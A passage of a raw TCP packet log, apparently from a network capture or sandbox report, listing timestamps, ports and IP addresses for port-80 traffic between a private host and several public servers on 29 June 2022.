Jun 29, 2022 23:12:20.558037996 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.558062077 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.558063984 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.558079004 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.558084965 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.558101892 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.558108091 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.558130980 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.558135033 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.558146954 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.558155060 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.558161020 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.558176041 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.558202028 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.559600115 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560302973 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560328007 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560367107 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560385942 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560388088 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560405016 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560411930 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560417891 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560436010 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560451984 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560457945 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560463905 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560497999 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560509920 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560512066 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560533047 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560555935 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560556889 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560578108 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560580015 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560599089 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560601950 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560616970 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560623884 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560645103 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560653925 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560663939 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560668945 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560684919 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560691118 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560703039 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560714006 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560731888 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560739040 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560754061 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560759068 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560780048 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560796022 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560801983 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560822964 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560834885 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560843945 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560847998 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560861111 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.560880899 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.560900927 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562035084 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562057972 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562078953 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562098980 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562117100 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562119961 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562140942 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562150002 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562161922 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562184095 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562185049 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562197924 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562213898 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562235117 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562238932 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562256098 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562256098 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562277079 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562278986 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562298059 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562304020 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562313080 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562323093 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562340975 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562362909 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562375069 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562386036 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562396049 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562412977 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562434912 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562433958 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562457085 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562462091 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562478065 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562491894 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562503099 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562525034 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562541962 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562546968 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562561989 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562567949 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562587023 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562593937 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562611103 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562632084 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562633991 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562654018 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562674046 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562694073 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562704086 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562715054 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562736034 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562746048 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562758923 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562762976 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562781096 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562793970 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562802076 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562800884 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562824965 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562827110 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562853098 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562879086 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562896013 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562907934 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562928915 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562937021 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562952995 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.562963963 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.562994003 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.563014030 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.563052893 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.563080072 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.563108921 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.563122034 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.563122034 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.563149929 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.563173056 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.563177109 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.563185930 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.563206911 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.563225985 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.563258886 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.564785957 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565005064 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565037966 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565061092 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565067053 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565093040 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565109015 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565115929 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565145016 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565171003 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565171957 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565186977 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565198898 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565216064 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565226078 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565251112 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565253019 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565268993 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565279961 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565304995 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565309048 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565326929 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565335035 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565359116 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565363884 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565378904 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565392017 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565412045 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565418959 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565434933 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565448046 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565468073 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565474987 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565493107 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565501928 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565526962 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565531015 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565543890 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565560102 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565589905 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.565594912 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565615892 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.565633059 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.566206932 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.566234112 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.566263914 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.566279888 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.566287041 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.566303015 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.566325903 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.566340923 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.566348076 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.566356897 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.566414118 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.566438913 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.566448927 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.566469908 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.566504002 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.567282915 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.567306995 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.567337036 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.567358971 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.567374945 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.567387104 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.567393064 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.567424059 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.567434072 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.567450047 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.567466974 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.567478895 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.567482948 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.567495108 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.567533016 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.567800999 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.567822933 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.567852974 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.567858934 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.567872047 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.567882061 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.567912102 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.567913055 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.567939997 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.567943096 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.567953110 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.567970037 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.567998886 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.567997932 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.568011999 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.568027020 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.568053961 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.568053961 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.568074942 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.568104029 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572149038 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572184086 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572217941 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572237968 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572251081 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572273970 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572290897 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572298050 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572326899 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572334051 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572343111 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572357893 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572381973 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572396994 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572410107 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572419882 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572439909 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572443008 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572470903 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572483063 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572495937 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572519064 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572535992 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572559118 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572592020 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572603941 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572614908 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572619915 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572642088 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572648048 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572674990 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572679043 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572700977 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572705030 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572734118 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.572741032 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572762012 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.572796106 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.573791981 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.573870897 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.582186937 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.583672047 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:20.583745956 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:20.600687981 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:21.808659077 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:21.833096981 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:21.833178997 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:21.856661081 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:21.880598068 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:21.881880999 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:22.542609930 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:22.542939901 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:23.430746078 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:23.430840015 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:23.601048946 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:23.624932051 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:23.625029087 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:23.702385902 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:23.702625036 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:23.728791952 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:23.729002953 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:23.752727032 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:23.752918005 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:23.784239054 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:23.784328938 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:23.804748058 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:23.969136000 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:25.380498886 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:25.404510975 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:25.404640913 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:25.445413113 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:25.445662975 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:25.470094919 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:25.493415117 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:25.493575096 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:25.597754002 CEST	49817	80	192.168.2.3	175.119.10.231
Jun 29, 2022 23:12:25.668585062 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:25.693979025 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:25.694092989 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:25.718470097 CEST	80	49783	195.158.3.162	192.168.2.3
Jun 29, 2022 23:12:25.859930038 CEST	49783	80	192.168.2.3	195.158.3.162
Jun 29, 2022 23:12:25.925085068 CEST	80	49817	175.119.10.231	192.168.2.3
Jun 29, 2022 23:12:25.925259113 CEST	49817	80	192.168.2.3	175.119.10.231
Jun 29, 2022 23:12:25.925429106 CEST	49817	80	192.168.2.3	175.119.10.231
Jun 29, 2022 23:12:25.925451040 CEST	49817	80	192.168.2.3	175.119.10.231
Jun 29, 2022 23:12:26.002223015 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:26.002316952 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:26.026424885 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.026504040 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:26.026767015 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.026813984 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.026823044 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:26.026866913 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:26.026913881 CEST	80	49792	159.69.101.170	192.168.2.3
Jun 29, 2022 23:12:26.026971102 CEST	49792	80	192.168.2.3	159.69.101.170
Jun 29, 2022 23:12:26.026979923 CEST	80	49792	159.69.101.170	192.168.2.3
